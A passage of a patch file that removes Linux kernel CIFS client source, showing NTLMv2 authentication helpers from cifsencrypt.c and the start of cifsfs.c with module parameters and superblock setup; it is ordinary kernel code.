+-	 * structure (av pair) which holds name/size
+-	 * ( for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL ) +
+-	 * unicode length of a netbios domain name
+-	 */
+-	kfree_sensitive(ses->auth_key.response);
+-	ses->auth_key.len = size + 2 * dlen;
+-	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		ses->auth_key.len = 0;
+-		return -ENOMEM;
+-	}
+-
+-	blobptr = ses->auth_key.response;
+-	attrptr = (struct ntlmssp2_name *) blobptr;
+-
+-	/*
+-	 * As defined in MS-NTLM 3.3.2, just this av pair field
+-	 * is sufficient as part of the temp
+-	 */
+-	attrptr->type = cpu_to_le16(NTLMSSP_AV_NB_DOMAIN_NAME);
+-	attrptr->length = cpu_to_le16(2 * dlen);
+-	blobptr = (unsigned char *)attrptr + sizeof(struct ntlmssp2_name);
+-	cifs_strtoUTF16((__le16 *)blobptr, ses->domainName, dlen, nls_cp);
+-
+-	return 0;
+-}
+-
+-/* Server has provided av pairs/target info in the type 2 challenge
+- * packet and we have plucked it and stored within smb session.
+- * We parse that blob here to find netbios domain name to be used
+- * as part of ntlmv2 authentication (in Target String), if not already
+- * specified on the command line.
+- * If this function returns without any error but without fetching
+- * domain name, authentication may fail against some server but
+- * may not fail against other (those who are not very particular
+- * about target string i.e. for some, just user name might suffice.
+- */
+-static int
+-find_domain_name(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	unsigned int attrsize;
+-	unsigned int type;
+-	unsigned int onesize = sizeof(struct ntlmssp2_name);
+-	unsigned char *blobptr;
+-	unsigned char *blobend;
+-	struct ntlmssp2_name *attrptr;
+-
+-	if (!ses->auth_key.len || !ses->auth_key.response)
+-		return 0;
+-
+-	blobptr = ses->auth_key.response;
+-	blobend = blobptr + ses->auth_key.len;
+-
+-	while (blobptr + onesize < blobend) {
+-		attrptr = (struct ntlmssp2_name *) blobptr;
+-		type = le16_to_cpu(attrptr->type);
+-		if (type == NTLMSSP_AV_EOL)
+-			break;
+-		blobptr += 2; /* advance attr type */
+-		attrsize = le16_to_cpu(attrptr->length);
+-		blobptr += 2; /* advance attr size */
+-		if (blobptr + attrsize > blobend)
+-			break;
+-		if (type == NTLMSSP_AV_NB_DOMAIN_NAME) {
+-			if (!attrsize || attrsize >= CIFS_MAX_DOMAINNAME_LEN)
+-				break;
+-			if (!ses->domainName) {
+-				ses->domainName =
+-					kmalloc(attrsize + 1, GFP_KERNEL);
+-				if (!ses->domainName)
+-						return -ENOMEM;
+-				cifs_from_utf16(ses->domainName,
+-					(__le16 *)blobptr, attrsize, attrsize,
+-					nls_cp, NO_MAP_UNI_RSVD);
+-				break;
+-			}
+-		}
+-		blobptr += attrsize; /* advance attr  value */
+-	}
+-
+-	return 0;
+-}
+-
+-/* Server has provided av pairs/target info in the type 2 challenge
+- * packet and we have plucked it and stored within smb session.
+- * We parse that blob here to find the server given timestamp
+- * as part of ntlmv2 authentication (or local current time as
+- * default in case of failure)
+- */
+-static __le64
+-find_timestamp(struct cifs_ses *ses)
+-{
+-	unsigned int attrsize;
+-	unsigned int type;
+-	unsigned int onesize = sizeof(struct ntlmssp2_name);
+-	unsigned char *blobptr;
+-	unsigned char *blobend;
+-	struct ntlmssp2_name *attrptr;
+-	struct timespec64 ts;
+-
+-	if (!ses->auth_key.len || !ses->auth_key.response)
+-		return 0;
+-
+-	blobptr = ses->auth_key.response;
+-	blobend = blobptr + ses->auth_key.len;
+-
+-	while (blobptr + onesize < blobend) {
+-		attrptr = (struct ntlmssp2_name *) blobptr;
+-		type = le16_to_cpu(attrptr->type);
+-		if (type == NTLMSSP_AV_EOL)
+-			break;
+-		blobptr += 2; /* advance attr type */
+-		attrsize = le16_to_cpu(attrptr->length);
+-		blobptr += 2; /* advance attr size */
+-		if (blobptr + attrsize > blobend)
+-			break;
+-		if (type == NTLMSSP_AV_TIMESTAMP) {
+-			if (attrsize == sizeof(u64))
+-				return *((__le64 *)blobptr);
+-		}
+-		blobptr += attrsize; /* advance attr value */
+-	}
+-
+-	ktime_get_real_ts64(&ts);
+-	return cpu_to_le64(cifs_UnixTimeToNT(ts));
+-}
+-
+-static int calc_ntlmv2_hash(struct cifs_ses *ses, char *ntlmv2_hash,
+-			    const struct nls_table *nls_cp)
+-{
+-	int rc = 0;
+-	int len;
+-	char nt_hash[CIFS_NTHASH_SIZE];
+-	__le16 *user;
+-	wchar_t *domain;
+-	wchar_t *server;
+-
+-	if (!ses->server->secmech.hmacmd5) {
+-		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
+-		return -1;
+-	}
+-
+-	/* calculate md4 hash of password */
+-	E_md4hash(ses->password, nt_hash, nls_cp);
+-
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm, nt_hash,
+-				CIFS_NTHASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NT Hash as a key\n", __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		return rc;
+-	}
+-
+-	/* convert ses->user_name to unicode */
+-	len = ses->user_name ? strlen(ses->user_name) : 0;
+-	user = kmalloc(2 + (len * 2), GFP_KERNEL);
+-	if (user == NULL) {
+-		rc = -ENOMEM;
+-		return rc;
+-	}
+-
+-	if (len) {
+-		len = cifs_strtoUTF16(user, ses->user_name, len, nls_cp);
+-		UniStrupr(user);
+-	} else {
+-		memset(user, '\0', 2);
+-	}
+-
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-				(char *)user, 2 * len);
+-	kfree(user);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with user\n", __func__);
+-		return rc;
+-	}
+-
+-	/* convert ses->domainName to unicode and uppercase */
+-	if (ses->domainName) {
+-		len = strlen(ses->domainName);
+-
+-		domain = kmalloc(2 + (len * 2), GFP_KERNEL);
+-		if (domain == NULL) {
+-			rc = -ENOMEM;
+-			return rc;
+-		}
+-		len = cifs_strtoUTF16((__le16 *)domain, ses->domainName, len,
+-				      nls_cp);
+-		rc =
+-		crypto_shash_update(ses->server->secmech.hmacmd5,
+-					(char *)domain, 2 * len);
+-		kfree(domain);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with domain\n",
+-				 __func__);
+-			return rc;
+-		}
+-	} else {
+-		/* We use ses->ip_addr if no domain name available */
+-		len = strlen(ses->ip_addr);
+-
+-		server = kmalloc(2 + (len * 2), GFP_KERNEL);
+-		if (server == NULL) {
+-			rc = -ENOMEM;
+-			return rc;
+-		}
+-		len = cifs_strtoUTF16((__le16 *)server, ses->ip_addr, len,
+-					nls_cp);
+-		rc =
+-		crypto_shash_update(ses->server->secmech.hmacmd5,
+-					(char *)server, 2 * len);
+-		kfree(server);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: Could not update with server\n",
+-				 __func__);
+-			return rc;
+-		}
+-	}
+-
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-					ntlmv2_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-static int
+-CalcNTLMv2_response(const struct cifs_ses *ses, char *ntlmv2_hash)
+-{
+-	int rc;
+-	struct ntlmv2_resp *ntlmv2 = (struct ntlmv2_resp *)
+-	    (ses->auth_key.response + CIFS_SESS_KEY_SIZE);
+-	unsigned int hash_len;
+-
+-	/* The MD5 hash starts at challenge_key.key */
+-	hash_len = ses->auth_key.len - (CIFS_SESS_KEY_SIZE +
+-		offsetof(struct ntlmv2_resp, challenge.key[0]));
+-
+-	if (!ses->server->secmech.hmacmd5) {
+-		cifs_dbg(VFS, "%s: can't generate ntlmv2 hash\n", __func__);
+-		return -1;
+-	}
+-
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
+-				 ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
+-			 __func__);
+-		return rc;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		return rc;
+-	}
+-
+-	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED)
+-		memcpy(ntlmv2->challenge.key,
+-		       ses->ntlmssp->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
+-	else
+-		memcpy(ntlmv2->challenge.key,
+-		       ses->server->cryptkey, CIFS_SERVER_CHALLENGE_SIZE);
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-				 ntlmv2->challenge.key, hash_len);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		return rc;
+-	}
+-
+-	/* Note that the MD5 digest over writes anon.challenge_key.key */
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-				ntlmv2->ntlmv2_hash);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-	return rc;
+-}
+-
+-int
+-setup_ntlmv2_rsp(struct cifs_ses *ses, const struct nls_table *nls_cp)
+-{
+-	int rc;
+-	int baselen;
+-	unsigned int tilen;
+-	struct ntlmv2_resp *ntlmv2;
+-	char ntlmv2_hash[16];
+-	unsigned char *tiblob = NULL; /* target info blob */
+-	__le64 rsp_timestamp;
+-
+-	if (nls_cp == NULL) {
+-		cifs_dbg(VFS, "%s called with nls_cp==NULL\n", __func__);
+-		return -EINVAL;
+-	}
+-
+-	if (ses->server->negflavor == CIFS_NEGFLAVOR_EXTENDED) {
+-		if (!ses->domainName) {
+-			if (ses->domainAuto) {
+-				rc = find_domain_name(ses, nls_cp);
+-				if (rc) {
+-					cifs_dbg(VFS, "error %d finding domain name\n",
+-						 rc);
+-					goto setup_ntlmv2_rsp_ret;
+-				}
+-			} else {
+-				ses->domainName = kstrdup("", GFP_KERNEL);
+-			}
+-		}
+-	} else {
+-		rc = build_avpair_blob(ses, nls_cp);
+-		if (rc) {
+-			cifs_dbg(VFS, "error %d building av pair blob\n", rc);
+-			goto setup_ntlmv2_rsp_ret;
+-		}
+-	}
+-
+-	/* Must be within 5 minutes of the server (or in range +/-2h
+-	 * in case of Mac OS X), so simply carry over server timestamp
+-	 * (as Windows 7 does)
+-	 */
+-	rsp_timestamp = find_timestamp(ses);
+-
+-	baselen = CIFS_SESS_KEY_SIZE + sizeof(struct ntlmv2_resp);
+-	tilen = ses->auth_key.len;
+-	tiblob = ses->auth_key.response;
+-
+-	ses->auth_key.response = kmalloc(baselen + tilen, GFP_KERNEL);
+-	if (!ses->auth_key.response) {
+-		rc = -ENOMEM;
+-		ses->auth_key.len = 0;
+-		goto setup_ntlmv2_rsp_ret;
+-	}
+-	ses->auth_key.len += baselen;
+-
+-	ntlmv2 = (struct ntlmv2_resp *)
+-			(ses->auth_key.response + CIFS_SESS_KEY_SIZE);
+-	ntlmv2->blob_signature = cpu_to_le32(0x00000101);
+-	ntlmv2->reserved = 0;
+-	ntlmv2->time = rsp_timestamp;
+-
+-	get_random_bytes(&ntlmv2->client_chal, sizeof(ntlmv2->client_chal));
+-	ntlmv2->reserved2 = 0;
+-
+-	memcpy(ses->auth_key.response + baselen, tiblob, tilen);
+-
+-	cifs_server_lock(ses->server);
+-
+-	rc = cifs_alloc_hash("hmac(md5)", &ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		goto unlock;
+-	}
+-
+-	/* calculate ntlmv2_hash */
+-	rc = calc_ntlmv2_hash(ses, ntlmv2_hash, nls_cp);
+-	if (rc) {
+-		cifs_dbg(VFS, "Could not get v2 hash rc %d\n", rc);
+-		goto unlock;
+-	}
+-
+-	/* calculate first part of the client response (CR1) */
+-	rc = CalcNTLMv2_response(ses, ntlmv2_hash);
+-	if (rc) {
+-		cifs_dbg(VFS, "Could not calculate CR1 rc: %d\n", rc);
+-		goto unlock;
+-	}
+-
+-	/* now calculate the session key for NTLMv2 */
+-	rc = crypto_shash_setkey(ses->server->secmech.hmacmd5->tfm,
+-		ntlmv2_hash, CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not set NTLMV2 Hash as a key\n",
+-			 __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_init(ses->server->secmech.hmacmd5);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not init hmacmd5\n", __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_update(ses->server->secmech.hmacmd5,
+-		ntlmv2->ntlmv2_hash,
+-		CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		cifs_dbg(VFS, "%s: Could not update with response\n", __func__);
+-		goto unlock;
+-	}
+-
+-	rc = crypto_shash_final(ses->server->secmech.hmacmd5,
+-		ses->auth_key.response);
+-	if (rc)
+-		cifs_dbg(VFS, "%s: Could not generate md5 hash\n", __func__);
+-
+-unlock:
+-	cifs_server_unlock(ses->server);
+-setup_ntlmv2_rsp_ret:
+-	kfree_sensitive(tiblob);
+-
+-	return rc;
+-}
+-
+-int
+-calc_seckey(struct cifs_ses *ses)
+-{
+-	unsigned char sec_key[CIFS_SESS_KEY_SIZE]; /* a nonce */
+-	struct arc4_ctx *ctx_arc4;
+-
+-	if (fips_enabled)
+-		return -ENODEV;
+-
+-	get_random_bytes(sec_key, CIFS_SESS_KEY_SIZE);
+-
+-	ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+-	if (!ctx_arc4) {
+-		cifs_dbg(VFS, "Could not allocate arc4 context\n");
+-		return -ENOMEM;
+-	}
+-
+-	cifs_arc4_setkey(ctx_arc4, ses->auth_key.response, CIFS_SESS_KEY_SIZE);
+-	cifs_arc4_crypt(ctx_arc4, ses->ntlmssp->ciphertext, sec_key,
+-			CIFS_CPHTXT_SIZE);
+-
+-	/* make secondary_key/nonce as session key */
+-	memcpy(ses->auth_key.response, sec_key, CIFS_SESS_KEY_SIZE);
+-	/* and make len as that of session key only */
+-	ses->auth_key.len = CIFS_SESS_KEY_SIZE;
+-
+-	memzero_explicit(sec_key, CIFS_SESS_KEY_SIZE);
+-	kfree_sensitive(ctx_arc4);
+-	return 0;
+-}
+-
+-void
+-cifs_crypto_secmech_release(struct TCP_Server_Info *server)
+-{
+-	cifs_free_hash(&server->secmech.aes_cmac);
+-	cifs_free_hash(&server->secmech.hmacsha256);
+-	cifs_free_hash(&server->secmech.md5);
+-	cifs_free_hash(&server->secmech.sha512);
+-	cifs_free_hash(&server->secmech.hmacmd5);
+-
+-	if (server->secmech.enc) {
+-		crypto_free_aead(server->secmech.enc);
+-		server->secmech.enc = NULL;
+-	}
+-
+-	if (server->secmech.dec) {
+-		crypto_free_aead(server->secmech.dec);
+-		server->secmech.dec = NULL;
+-	}
+-}
+diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c
+deleted file mode 100644
+index 078df1e2dd18a..0000000000000
+--- a/fs/cifs/cifsfs.c
++++ /dev/null
+@@ -1,1857 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Common Internet FileSystem (CIFS) client
+- *
+- */
+-
+-/* Note that BB means BUGBUG (ie something to fix eventually) */
+-
+-#include <linux/module.h>
+-#include <linux/fs.h>
+-#include <linux/mount.h>
+-#include <linux/slab.h>
+-#include <linux/init.h>
+-#include <linux/list.h>
+-#include <linux/seq_file.h>
+-#include <linux/vfs.h>
+-#include <linux/mempool.h>
+-#include <linux/delay.h>
+-#include <linux/kthread.h>
+-#include <linux/freezer.h>
+-#include <linux/namei.h>
+-#include <linux/random.h>
+-#include <linux/uuid.h>
+-#include <linux/xattr.h>
+-#include <uapi/linux/magic.h>
+-#include <net/ipv6.h>
+-#include "cifsfs.h"
+-#include "cifspdu.h"
+-#define DECLARE_GLOBALS_HERE
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include <linux/mm.h>
+-#include <linux/key-type.h>
+-#include "cifs_spnego.h"
+-#include "fscache.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-#include "netlink.h"
+-#endif
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/*
+- * DOS dates from 1980/1/1 through 2107/12/31
+- * Protocol specifications indicate the range should be to 119, which
+- * limits maximum year to 2099. But this range has not been checked.
+- */
+-#define SMB_DATE_MAX (127<<9 | 12<<5 | 31)
+-#define SMB_DATE_MIN (0<<9 | 1<<5 | 1)
+-#define SMB_TIME_MAX (23<<11 | 59<<5 | 29)
+-
+-int cifsFYI = 0;
+-bool traceSMB;
+-bool enable_oplocks = true;
+-bool linuxExtEnabled = true;
+-bool lookupCacheEnabled = true;
+-bool disable_legacy_dialects; /* false by default */
+-bool enable_gcm_256 = true;
+-bool require_gcm_256; /* false by default */
+-bool enable_negotiate_signing; /* false by default */
+-unsigned int global_secflags = CIFSSEC_DEF;
+-/* unsigned int ntlmv2_support = 0; */
+-unsigned int sign_CIFS_PDUs = 1;
+-
+-/*
+- * Global transaction id (XID) information
+- */
+-unsigned int GlobalCurrentXid;	/* protected by GlobalMid_Sem */
+-unsigned int GlobalTotalActiveXid; /* prot by GlobalMid_Sem */
+-unsigned int GlobalMaxActiveXid;	/* prot by GlobalMid_Sem */
+-spinlock_t GlobalMid_Lock; /* protects above & list operations on midQ entries */
+-
+-/*
+- *  Global counters, updated atomically
+- */
+-atomic_t sesInfoAllocCount;
+-atomic_t tconInfoAllocCount;
+-atomic_t tcpSesNextId;
+-atomic_t tcpSesAllocCount;
+-atomic_t tcpSesReconnectCount;
+-atomic_t tconInfoReconnectCount;
+-
+-atomic_t mid_count;
+-atomic_t buf_alloc_count;
+-atomic_t small_buf_alloc_count;
+-#ifdef CONFIG_CIFS_STATS2
+-atomic_t total_buf_alloc_count;
+-atomic_t total_small_buf_alloc_count;
+-#endif/* STATS2 */
+-struct list_head	cifs_tcp_ses_list;
+-spinlock_t		cifs_tcp_ses_lock;
+-static const struct super_operations cifs_super_ops;
+-unsigned int CIFSMaxBufSize = CIFS_MAX_MSGSIZE;
+-module_param(CIFSMaxBufSize, uint, 0444);
+-MODULE_PARM_DESC(CIFSMaxBufSize, "Network buffer size (not including header) "
+-				 "for CIFS requests. "
+-				 "Default: 16384 Range: 8192 to 130048");
+-unsigned int cifs_min_rcv = CIFS_MIN_RCV_POOL;
+-module_param(cifs_min_rcv, uint, 0444);
+-MODULE_PARM_DESC(cifs_min_rcv, "Network buffers in pool. Default: 4 Range: "
+-				"1 to 64");
+-unsigned int cifs_min_small = 30;
+-module_param(cifs_min_small, uint, 0444);
+-MODULE_PARM_DESC(cifs_min_small, "Small network buffers in pool. Default: 30 "
+-				 "Range: 2 to 256");
+-unsigned int cifs_max_pending = CIFS_MAX_REQ;
+-module_param(cifs_max_pending, uint, 0444);
+-MODULE_PARM_DESC(cifs_max_pending, "Simultaneous requests to server for "
+-				   "CIFS/SMB1 dialect (N/A for SMB3) "
+-				   "Default: 32767 Range: 2 to 32767.");
+-#ifdef CONFIG_CIFS_STATS2
+-unsigned int slow_rsp_threshold = 1;
+-module_param(slow_rsp_threshold, uint, 0644);
+-MODULE_PARM_DESC(slow_rsp_threshold, "Amount of time (in seconds) to wait "
+-				   "before logging that a response is delayed. "
+-				   "Default: 1 (if set to 0 disables msg).");
+-#endif /* STATS2 */
+-
+-module_param(enable_oplocks, bool, 0644);
+-MODULE_PARM_DESC(enable_oplocks, "Enable or disable oplocks. Default: y/Y/1");
+-
+-module_param(enable_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(enable_gcm_256, "Enable requesting strongest (256 bit) GCM encryption. Default: n/N/0");
+-
+-module_param(require_gcm_256, bool, 0644);
+-MODULE_PARM_DESC(require_gcm_256, "Require strongest (256 bit) GCM encryption. Default: n/N/0");
+-
+-module_param(enable_negotiate_signing, bool, 0644);
+-MODULE_PARM_DESC(enable_negotiate_signing, "Enable negotiating packet signing algorithm with server. Default: n/N/0");
+-
+-module_param(disable_legacy_dialects, bool, 0644);
+-MODULE_PARM_DESC(disable_legacy_dialects, "To improve security it may be "
+-				  "helpful to restrict the ability to "
+-				  "override the default dialects (SMB2.1, "
+-				  "SMB3 and SMB3.02) on mount with old "
+-				  "dialects (CIFS/SMB1 and SMB2) since "
+-				  "vers=1.0 (CIFS/SMB1) and vers=2.0 are weaker"
+-				  " and less secure. Default: n/N/0");
+-
+-extern mempool_t *cifs_sm_req_poolp;
+-extern mempool_t *cifs_req_poolp;
+-extern mempool_t *cifs_mid_poolp;
+-
+-struct workqueue_struct	*cifsiod_wq;
+-struct workqueue_struct	*decrypt_wq;
+-struct workqueue_struct	*fileinfo_put_wq;
+-struct workqueue_struct	*cifsoplockd_wq;
+-struct workqueue_struct	*deferredclose_wq;
+-__u32 cifs_lock_secret;
+-
+-/*
+- * Bumps refcount for cifs super block.
+- * Note that it should be only called if a referece to VFS super block is
+- * already held, e.g. in open-type syscalls context. Otherwise it can race with
+- * atomic_dec_and_test in deactivate_locked_super.
+- */
+-void
+-cifs_sb_active(struct super_block *sb)
+-{
+-	struct cifs_sb_info *server = CIFS_SB(sb);
+-
+-	if (atomic_inc_return(&server->active) == 1)
+-		atomic_inc(&sb->s_active);
+-}
+-
+-void
+-cifs_sb_deactive(struct super_block *sb)
+-{
+-	struct cifs_sb_info *server = CIFS_SB(sb);
+-
+-	if (atomic_dec_and_test(&server->active))
+-		deactivate_super(sb);
+-}
+-
+-static int
+-cifs_read_super(struct super_block *sb)
+-{
+-	struct inode *inode;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct timespec64 ts;
+-	int rc = 0;
+-
+-	cifs_sb = CIFS_SB(sb);
+-	tcon = cifs_sb_master_tcon(cifs_sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_POSIXACL)
+-		sb->s_flags |= SB_POSIXACL;
+-
+-	if (tcon->snapshot_time)
+-		sb->s_flags |= SB_RDONLY;
+-
+-	if (tcon->ses->capabilities & tcon->ses->server->vals->cap_large_files)
+-		sb->s_maxbytes = MAX_LFS_FILESIZE;
+-	else
+-		sb->s_maxbytes = MAX_NON_LFS;
+-
+-	/*
+-	 * Some very old servers like DOS and OS/2 used 2 second granularity
+-	 * (while all current servers use 100ns granularity - see MS-DTYP)
+-	 * but 1 second is the maximum allowed granularity for the VFS
+-	 * so for old servers set time granularity to 1 second while for
+-	 * everything else (current servers) set it to 100ns.
+-	 */
+-	if ((tcon->ses->server->vals->protocol_id == SMB10_PROT_ID) &&
+-	    ((tcon->ses->capabilities &
+-	      tcon->ses->server->vals->cap_nt_find) == 0) &&
+-	    !tcon->unix_ext) {
+-		sb->s_time_gran = 1000000000; /* 1 second is max allowed gran */
+-		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MIN), 0, 0);
+-		sb->s_time_min = ts.tv_sec;
+-		ts = cnvrtDosUnixTm(cpu_to_le16(SMB_DATE_MAX),
+-				    cpu_to_le16(SMB_TIME_MAX), 0);
+-		sb->s_time_max = ts.tv_sec;
+-	} else {
+-		/*
+-		 * Almost every server, including all SMB2+, uses DCE TIME
+-		 * ie 100 nanosecond units, since 1601.  See MS-DTYP and MS-FSCC
+-		 */
+-		sb->s_time_gran = 100;
+-		ts = cifs_NTtimeToUnix(0);
+-		sb->s_time_min = ts.tv_sec;
+-		ts = cifs_NTtimeToUnix(cpu_to_le64(S64_MAX));
+-		sb->s_time_max = ts.tv_sec;
+-	}
+-
+-	sb->s_magic = CIFS_SUPER_MAGIC;
+-	sb->s_op = &cifs_super_ops;
+-	sb->s_xattr = cifs_xattr_handlers;
+-	rc = super_setup_bdi(sb);
+-	if (rc)
+-		goto out_no_root;
+-	/* tune readahead according to rsize if readahead size not set on mount */
+-	if (cifs_sb->ctx->rsize == 0)
+-		cifs_sb->ctx->rsize =
+-			tcon->ses->server->ops->negotiate_rsize(tcon, cifs_sb->ctx);
+-	if (cifs_sb->ctx->rasize)
+-		sb->s_bdi->ra_pages = cifs_sb->ctx->rasize / PAGE_SIZE;
+-	else
+-		sb->s_bdi->ra_pages = cifs_sb->ctx->rsize / PAGE_SIZE;
+-
+-	sb->s_blocksize = CIFS_MAX_MSGSIZE;
+-	sb->s_blocksize_bits = 14;	/* default 2**14 = CIFS_MAX_MSGSIZE */
+-	inode = cifs_root_iget(sb);
+-
+-	if (IS_ERR(inode)) {
+-		rc = PTR_ERR(inode);
+-		goto out_no_root;
+-	}
+-
+-	if (tcon->nocase)
+-		sb->s_d_op = &cifs_ci_dentry_ops;
+-	else
+-		sb->s_d_op = &cifs_dentry_ops;
+-
+-	sb->s_root = d_make_root(inode);
+-	if (!sb->s_root) {
+-		rc = -ENOMEM;
+-		goto out_no_root;
+-	}
+-
+-#ifdef CONFIG_CIFS_NFSD_EXPORT
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		cifs_dbg(FYI, "export ops supported\n");
+-		sb->s_export_op = &cifs_export_ops;
+-	}
+-#endif /* CONFIG_CIFS_NFSD_EXPORT */
+-
+-	return 0;
+-
+-out_no_root:
+-	cifs_dbg(VFS, "%s: get root inode failed\n", __func__);
+-	return rc;
+-}
+-
+-static void cifs_kill_sb(struct super_block *sb)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-
+-	/*
+-	 * We ned to release all dentries for the cached directories
+-	 * before we kill the sb.
+-	 */
+-	if (cifs_sb->root) {
+-		close_all_cached_dirs(cifs_sb);
+-
+-		/* finally release root dentry */
+-		dput(cifs_sb->root);
+-		cifs_sb->root = NULL;
+-	}
+-
+-	kill_anon_super(sb);
+-	cifs_umount(cifs_sb);
+-}
+-
+-static int
+-cifs_statfs(struct dentry *dentry, struct kstatfs *buf)
+-{
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int xid;
+-	int rc = 0;
+-
+-	xid = get_xid();
+-
+-	if (le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength) > 0)
+-		buf->f_namelen =
+-		       le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength);
+-	else
+-		buf->f_namelen = PATH_MAX;
+-
+-	buf->f_fsid.val[0] = tcon->vol_serial_number;
+-	/* are using part of create time for more randomness, see man statfs */
+-	buf->f_fsid.val[1] =  (int)le64_to_cpu(tcon->vol_create_time);
+-
+-	buf->f_files = 0;	/* undefined */
+-	buf->f_ffree = 0;	/* unlimited */
+-
+-	if (server->ops->queryfs)
+-		rc = server->ops->queryfs(xid, tcon, cifs_sb, buf);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long cifs_fallocate(struct file *file, int mode, loff_t off, loff_t len)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	if (server->ops->fallocate)
+-		return server->ops->fallocate(file, tcon, mode, off, len);
+-
+-	return -EOPNOTSUPP;
+-}
+-
+-static int cifs_permission(struct user_namespace *mnt_userns,
+-			   struct inode *inode, int mask)
+-{
+-	struct cifs_sb_info *cifs_sb;
+-
+-	cifs_sb = CIFS_SB(inode->i_sb);
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_PERM) {
+-		if ((mask & MAY_EXEC) && !execute_ok(inode))
+-			return -EACCES;
+-		else
+-			return 0;
+-	} else /* file mode might have been restricted at mount time
+-		on the client (above and beyond ACL on servers) for
+-		servers which do not support setting and viewing mode bits,
+-		so allowing client to check permissions is useful */
+-		return generic_permission(&init_user_ns, inode, mask);
+-}
+-
+-static struct kmem_cache *cifs_inode_cachep;
+-static struct kmem_cache *cifs_req_cachep;
+-static struct kmem_cache *cifs_mid_cachep;
+-static struct kmem_cache *cifs_sm_req_cachep;
+-mempool_t *cifs_sm_req_poolp;
+-mempool_t *cifs_req_poolp;
+-mempool_t *cifs_mid_poolp;
+-
+-static struct inode *
+-cifs_alloc_inode(struct super_block *sb)
+-{
+-	struct cifsInodeInfo *cifs_inode;
+-	cifs_inode = alloc_inode_sb(sb, cifs_inode_cachep, GFP_KERNEL);
+-	if (!cifs_inode)
+-		return NULL;
+-	cifs_inode->cifsAttrs = 0x20;	/* default */
+-	cifs_inode->time = 0;
+-	/*
+-	 * Until the file is open and we have gotten oplock info back from the
+-	 * server, can not assume caching of file data or metadata.
+-	 */
+-	cifs_set_oplock_level(cifs_inode, 0);
+-	cifs_inode->flags = 0;
+-	spin_lock_init(&cifs_inode->writers_lock);
+-	cifs_inode->writers = 0;
+-	cifs_inode->netfs.inode.i_blkbits = 14;  /* 2**14 = CIFS_MAX_MSGSIZE */
+-	cifs_inode->server_eof = 0;
+-	cifs_inode->uniqueid = 0;
+-	cifs_inode->createtime = 0;
+-	cifs_inode->epoch = 0;
+-	spin_lock_init(&cifs_inode->open_file_lock);
+-	generate_random_uuid(cifs_inode->lease_key);
+-	cifs_inode->symlink_target = NULL;
+-
+-	/*
